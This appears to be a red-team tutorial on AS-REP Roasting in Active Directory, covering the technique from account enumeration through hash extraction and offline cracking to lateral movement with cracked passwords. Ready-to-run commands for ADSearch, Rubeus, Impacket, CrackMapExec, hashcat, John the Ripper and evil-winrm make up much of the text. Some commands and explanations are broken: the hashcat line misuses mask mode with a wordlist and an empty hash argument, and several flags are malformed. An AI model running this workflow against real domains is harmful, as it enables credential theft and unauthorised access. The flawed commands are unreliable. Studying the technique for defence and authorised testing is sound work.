Active Directory users that have the Kerberos pre-authentication enabled and require access to a resource initiate the Kerberos authentication process by sending an Authentication Server Request (AS-REQ) message to the domain controller. The timestamp on that message is encrypted with the hash of the user’s password. The domain controller can decrypt the timestamp using its own record of the user password hash and it will send back an Authentication Response (AS-REP) that contains a TGT (Ticket Granting Ticket) issued by the Key Distribution Center which will be utilized for any future access requests by the user.

Any users in the domain that have the Kerberos pre-authentication disabled enables red teams to request authentication data for any user in the Active Directory enforcing the domain controller to return the AS-REP message which is encrypted with the password hash of the user. Conducting offline cracking, the password of the user can retrieved which could be used for lateral movement. Even though by default the option Do not require Kerberos pre-authentication is not enabled, some Active Directory accounts such as service accounts might have that option enabled for compatibility reasons i.e. to allow specific applications to work properly since some applications doesn’t support Kerberos pre-authentication.

Specifically, the Kerberos pre-authentication requires the user to supply it’s secret key which is derived from it’s password prior to any TGT issued by the Key Distribution Center (KDC) as a verification. The ticket granting ticket is sent to the user in the KRB_AS_REP message which also contains the session key. When the Kerberos pre-authentication is disabled, a user in the network can skip this verification and request TGT’s that will contain the session keys for offline cracking.

Kerberos Pre-authentication

Enumeration

In order to be able to conduct the AS-REP Roasting technique the vulnerable accounts needs to be enumerated. ADSearch is a tool that can perform LDAP queries in order to enumerate active directory objects. The sAMAccountType=805306368 will query only Active Directory users and not computert accounts or groups. The userAccountControl:1.2.840.113556.1.4.803:=4194304 defines the users that have the setting Do not require Kerberos pre-authentication enabled.

dotnet inline-execute /home/kali/ADSearch.exe --search "(&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
AS-REP Roasting – ADSearch

It is also feasible to identify vulnerable to AS-REP roasting accounts from a non-domain joined system using the Impacket module GetNPUsers.

impacket-GetNPUsers -dc-ip 10.0.0.1 -ts  red.lab/peter:Password123
AS-REP Roasting – Impacket Authenticated

AS-REP

The technique of AS-REP Roast has been implemented in Rubeus tool with the flag asreproast. Rubeus will identify all accounts in the domain that do not require Kerberos pre-authentication and extract their AS-REP hashes.

dotnet inline-execute /home/kali/Rubeus.exe asreproast
AS-REP Roasting – Rubeus over C2
.\Rubeus.exe asreproast
AS-REP Roasting – Rubeus

It is also feasible to conduct the AS-REP Roasting technique from a non-domain joined system and from unauthenticated perspective with the module GetNPUsers from Impacket suite. Supplying a list of active directory usernames against the domain controller will retrieve the Kerberos authentication response (AS-REP) hashes of the vulnerable accounts.

impacket-GetNPUsers -no-pass -usersfile usernames.txt -dc-ip 10.0.0.1 red.lab/
AS-REP Roasting – Impacket No Pass
impacket-GetNPUsers -usersfile /home/kali/Desktop/usernames.txt -request -dc-ip 10.0.0.1 "red.lab/"
AS-REP Roasting – Impacket

Execution of the command below will perform the authentication in the domain controller and will format the AS-REP hash so it could be used by john the ripper.

impacket-GetNPUsers red.lab/peter:Password123 -request -format john | grep "$krb5asrep$"
AS-REP Roasting – Impacket John The Ripper Format

Alternatively, crackmapexec can also perform the AS-REP Roasting technique from authenticated or unauthenticated context.

crackmapexec ldap -dc-ip 10.0.0.1 -u usernames.txt -p '' --asreproast asreproast.out 
AS-REP Roasting – Crackmapexec Unauthenticated
crackmapexec ldap 10.0.0.1 -u 'peter' -p 'Password123' –asreproast ./hash.asrep
crackmapexec ldap -dc-ip 10.0.0.1 -u usernames.txt -p 'Password123' --asreproast asreproast.out
AS-REP Roasting – Crackmapexec

Offline Cracking

Once the hash has been retrieved it could be cracked using hashcat. Since the hash is Kerberos 5 AS-REP etype 23 the associated hash mode for this type of encryption is 18200. The attack mode 3 will conduct a mask type attack against a given wordlist. Specifically, hashcat will attempt to crack the hash by trying all characters from given charsets per position.

hashcat -m18200 '' -a 3 /usr/share/wordlists/rockyou.txt
AS-REP Roasting – Hashcat

If the password is not sufficiently strong, hashcat will crack the password.

AS-REP Roasting – Hashcat Password

Alternatively, john the ripper can be used to crack Kerberos 5 AS-REP hashes. The hash can be written into a file called hash.asrep.

AS-REP Roasting – Hash

Executing the following command will attempt to crack the password hash.

john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5asrep /home/kali/hash.asrep
AS-REP Roasting – john the ripper

Lateral Movement

If the account is elevated, the cracked password can be used to authenticate with the target system using evil-winrm.

evil-winrm -u Administrator -p Password123 -i @10.0.0.1
AS-REP Roasting – Lateral Movement

References

  1. https://www.netexec.wiki/ldap-protocol/asreproast
  2. https://www.thehacker.recipes/ad/movement/kerberos/asreproast
  3. https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat
  4. https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast
  5. https://www.picussecurity.com/resource/blog/as-rep-roasting-attack-explained-mitre-attack-t1558.004
  6. https://medium.com/@jbtechmaven/hacking-active-directory-with-as-rep-roasting-15ca0d9fae5c
  7. https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/credential-access/t1558-steal-or-forge-kerberos-tickets/as-rep-roasting